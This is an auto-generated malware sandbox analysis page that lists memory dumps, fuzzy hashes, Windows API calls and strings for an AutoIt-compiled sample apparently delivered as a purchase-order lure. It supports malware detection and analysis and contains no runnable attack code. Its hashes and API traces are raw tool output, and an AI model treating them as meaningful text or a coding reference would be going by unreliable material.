Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 44f5d9664e715192188212fdf678a4eee384f5bf2223b1db12e0b08a2e30af3f
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 67C1E4323052A309DF2D4639943443FBAE15AA27B170A036FD4B3CB6D6FF28C569D624

Function 00AB6EAF Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
Instruction ID: 1af492327799843f9733e3b2486c3381ee7e0cce26e58b5207dc5620addfdcee
Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
Instruction Fuzzy Hash: 2FA193B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A

Function 00AE5980 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792

Function 00AB7F80 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5f9f8afac8dba86c6d57009b3cb5d47ea7df5cf61bf8cd1437bc79fe4db5d5
Instruction ID: b11d8a742966ccaae8ad1f1d1b7eaf7909952427d739a7786324d33d2cd1095a
Opcode Fuzzy Hash: 2c5f9f8afac8dba86c6d57009b3cb5d47ea7df5cf61bf8cd1437bc79fe4db5d5
Instruction Fuzzy Hash: C5611475A287A44BC312AF7DE8412BAB398FFE6384F44C73EEA8562651DB341106C304

Function 00AB7B71 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3aed30a42e13c4a75e9fe00efa9d7510a9d3dacbe183bf7ec0b78647e89edc
Instruction ID: ebade3e3b653b6c4ad4a9029f1035b73c3fe35f95719bcb2c59fbf0a647b505c
Opcode Fuzzy Hash: 4f3aed30a42e13c4a75e9fe00efa9d7510a9d3dacbe183bf7ec0b78647e89edc
Instruction Fuzzy Hash: 0241A1306083558FC728EF69E8E06BBB3D5FBC9315F65493ED6C683281CA386426CB51

Function 00AE3780 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92

Function 00AED580 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94

Function 00C14618 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 976e304ee223d953fdc39443ce67f257d128b71e0244738a4644f29a76ed3997
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 0741C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 00C14508 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: e4390c3b0d51ff6a913c70c8c9a8be96d2a273b88c7e98344289dbb5e45f3de1
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 4D019674A00109EFCB48DF98C5909AEF7B6FB88310F208599E81997301D730AE41EB80

Function 00C144A8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 4d7665fb20c9c1803a6d64aaa1febf6452db8d27576f923ebcf9e174e688f649
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 42019678A00109EFCB58DF98C5909AEF7B5FB48310F208599D815A7701D730AE51EB80

Function 00C12E48 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00AB1130 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 0045A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0045A2FE
DeleteObject.GDI32(00000000), ref: 0045A310
DestroyWindow.USER32 ref: 0045A31E
GetDesktopWindow.USER32 ref: 0045A338
GetWindowRect.USER32(00000000), ref: 0045A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0045A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A4D8
GetClientRect.USER32(00000000,?), ref: 0045A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0045A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A55E
GlobalLock.KERNEL32(00000000), ref: 0045A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A576
GlobalUnlock.KERNEL32(00000000), ref: 0045A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A586
GlobalFree.KERNEL32(00000000), ref: 0045A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0048D9BC,00000000), ref: 0045A5B9
GlobalFree.KERNEL32(00000000), ref: 0045A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0045A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0045A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A81D

Strings

DISPLAY, xrefs: 0045A680
AutoIt v3, xrefs: 0045A4D0
, xrefs: 0045A7A3
static, xrefs: 0045A518, 0045A66F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c655ef112de186f858fd53f182a34cedddeea54428e8a146943ae00af5ea0fb5
Instruction ID: 53d84e717a84cd646c9bb37dc5a0418975d314d2cf4d1fc3b1c59ead6aebad59
Opcode Fuzzy Hash: c655ef112de186f858fd53f182a34cedddeea54428e8a146943ae00af5ea0fb5
Instruction Fuzzy Hash: 29029C71900108AFDB14DFA5CD88EAE7BB9FF49315F008669F905AB2A2C734DD45CB68

Function 0046D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0046D2DB
GetSysColorBrush.USER32(0000000F), ref: 0046D30C
GetSysColor.USER32(0000000F), ref: 0046D318
SetBkColor.GDI32(?,000000FF), ref: 0046D332
SelectObject.GDI32(?,00000000), ref: 0046D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D36C
GetSysColor.USER32(00000010), ref: 0046D374
CreateSolidBrush.GDI32(00000000), ref: 0046D37B
FrameRect.USER32(?,?,00000000), ref: 0046D38A
DeleteObject.GDI32(00000000), ref: 0046D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0046D3DC
FillRect.USER32(?,?,00000000), ref: 0046D40E
GetWindowLongW.USER32(?,000000F0), ref: 0046D439

Part of subcall function 0046D575: GetSysColor.USER32(00000012), ref: 0046D5AE
Part of subcall function 0046D575: SetTextColor.GDI32(?,?), ref: 0046D5B2
Part of subcall function 0046D575: GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
Part of subcall function 0046D575: GetSysColor.USER32(0000000F), ref: 0046D5D3
Part of subcall function 0046D575: GetSysColor.USER32(00000011), ref: 0046D5F0
Part of subcall function 0046D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
Part of subcall function 0046D575: SelectObject.GDI32(?,00000000), ref: 0046D60F
Part of subcall function 0046D575: SetBkColor.GDI32(?,00000000), ref: 0046D618
Part of subcall function 0046D575: SelectObject.GDI32(?,?), ref: 0046D625
Part of subcall function 0046D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
Part of subcall function 0046D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
Part of subcall function 0046D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
Part of subcall function 0046D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: b9fc4010df688c53206ee3d8536c12a272738b95772e264f5af44db37216222e
Instruction ID: fc64aee0f8033bc08b65d9275a05176ebd0246f14ea06a4dbed0e4f224444525
Opcode Fuzzy Hash: b9fc4010df688c53206ee3d8536c12a272738b95772e264f5af44db37216222e
Instruction Fuzzy Hash: 06918C71909301BFCB10AF64DC48E6F7BA9FF89325F100A2EF962961E0D735D9448B5A

Function 0041B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0041B98B
DeleteObject.GDI32(00000000), ref: 0041B9CD
DeleteObject.GDI32(00000000), ref: 0041B9D8
DestroyIcon.USER32(00000000), ref: 0041B9E3
DestroyWindow.USER32(00000000), ref: 0041B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0047D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0047D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0047D711

Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58

SendMessageW.USER32 ref: 0047D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0047D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0047D785
ImageList_Destroy.COMCTL32(00000000), ref: 0047D790

Strings

0, xrefs: 0047D5A5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
Instruction ID: 1b00305283755ee8e1f68ab188fd9dc62ffc5e41ef1510419ecd282818b9119d
Opcode Fuzzy Hash: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
Instruction Fuzzy Hash: C2128D70914201AFDB15CF24C884BEABBF5FF45304F14856EE989DB252C739E882CB99

Function 0040CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0040CC68
__wcsnicmp.LIBCMT ref: 0040CC80
__wcsnicmp.LIBCMT ref: 0040CC98
__wcsnicmp.LIBCMT ref: 0040CCB0
__wcsnicmp.LIBCMT ref: 0040CCC8
__wcsnicmp.LIBCMT ref: 0040CCE0
__wcsnicmp.LIBCMT ref: 0040CCF8
__wcsnicmp.LIBCMT ref: 0040CD0C
__wcsnicmp.LIBCMT ref: 0040CD4D
__wcsnicmp.LIBCMT ref: 0040CD61
__wcsnicmp.LIBCMT ref: 0040CD75
__wcsnicmp.LIBCMT ref: 0040CD89

Strings

#include-once, xrefs: 0040CCC2
#requireadmin, xrefs: 0040CC92
#pragma compile, xrefs: 0040CC62
#OnAutoItStartRegister, xrefs: 0040CCAA
#cs, xrefs: 0040CD06, 0040CD5B
Unterminated group of comments, xrefs: 00472FB4
#ce, xrefs: 0040CD83
Cannot parse #include, xrefs: 00472FA1
Bad directive syntax error, xrefs: 00472ECB
#notrayicon, xrefs: 0040CC7A
#include, xrefs: 0040CCDA
#comments-end, xrefs: 0040CD6F
#comments-start, xrefs: 0040CCF2, 0040CD47

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 04142dc542e498ef1dc1ce7213834fed4f42303091bcc503bccc4d31e210c057
Instruction ID: 06179b6bf307cae3cf48bf65e9d4e0c3680e96e7f80719158496d28e555dcc9d
Opcode Fuzzy Hash: 04142dc542e498ef1dc1ce7213834fed4f42303091bcc503bccc4d31e210c057
Instruction Fuzzy Hash: B081F770640215BADB20AB65DDC2FEB3B68AF24344F14413FF909761C6EABC9945C2AD

Function 0046C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0046C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0046C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0046C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0046CB15

Strings

0, xrefs: 0046C89C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: cb305e246e9808962085cd307d7770feb3073be77f7200dbf61d466a01f4aab1
Instruction ID: f09e5bb1ad1c00c77308f307c9b90b32b86210494ba77bfe049ff4a6769cfe2f
Opcode Fuzzy Hash: cb305e246e9808962085cd307d7770feb3073be77f7200dbf61d466a01f4aab1
Instruction Fuzzy Hash: 28F1C270605301ABD7218F24C885BBBBBE4FF49714F08092EF5D8962A1E778D845DB9B

Function 0046638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0049DC00), ref: 00466449

Strings

ISCHECKED, xrefs: 00466659
GETSELECTED, xrefs: 004666C1
GETCURRENTLINE, xrefs: 00466704
HIDEDROPDOWN, xrefs: 00466520
GETCURRENTCOL, xrefs: 00466724
FINDSTRING, xrefs: 00466596
SENDCOMMANDID, xrefs: 004667CA
ADDSTRING, xrefs: 00466536
EDITPASTE, xrefs: 0046675B
SHOWDROPDOWN, xrefs: 00466500
CHECK, xrefs: 0046668B
UNCHECK, xrefs: 004666A1
DELSTRING, xrefs: 00466569
CURRENTTAB, xrefs: 004664DD
SELECTSTRING, xrefs: 00466626
ISENABLED, xrefs: 0046648C
ISVISIBLE, xrefs: 00466455
TABLEFT, xrefs: 004664A7
SETCURRENTSELECTION, xrefs: 004665D6
GETCURRENTSELECTION, xrefs: 00466603
TABRIGHT, xrefs: 004664BD
GETLINECOUNT, xrefs: 004666E4
GETLINE, xrefs: 0046678B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
Instruction ID: bf06782b9b2ecba1bbd79463fd2e0cebf5d6bb80645d400e677d0eaac971ff05
Opcode Fuzzy Hash: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
Instruction Fuzzy Hash: DDC144342042469BCA04EF12C551AAE7795AF94348F05486FF88557393EB3CED4ACB9F

Function 0046D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0046D5AE
SetTextColor.GDI32(?,?), ref: 0046D5B2
GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
GetSysColor.USER32(0000000F), ref: 0046D5D3
CreateSolidBrush.GDI32(?), ref: 0046D5D8
GetSysColor.USER32(00000011), ref: 0046D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
SelectObject.GDI32(?,00000000), ref: 0046D60F
SetBkColor.GDI32(?,00000000), ref: 0046D618
SelectObject.GDI32(?,?), ref: 0046D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0046D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0046D6DD
DrawFocusRect.USER32(?,?), ref: 0046D6E8
GetSysColor.USER32(00000011), ref: 0046D6F6
